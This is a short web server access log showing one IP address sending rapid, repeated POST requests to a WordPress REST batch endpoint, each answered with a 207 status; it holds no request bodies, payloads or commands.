45.148.10.21 - - [26/Jul/2026:11:22:55 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:55 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:56 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:56 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:57 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:57 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:58 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:58 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:59 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:59 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:00 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:00 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:01 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:01 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:02 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:02 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:03 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:03 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:04 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:23:04 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
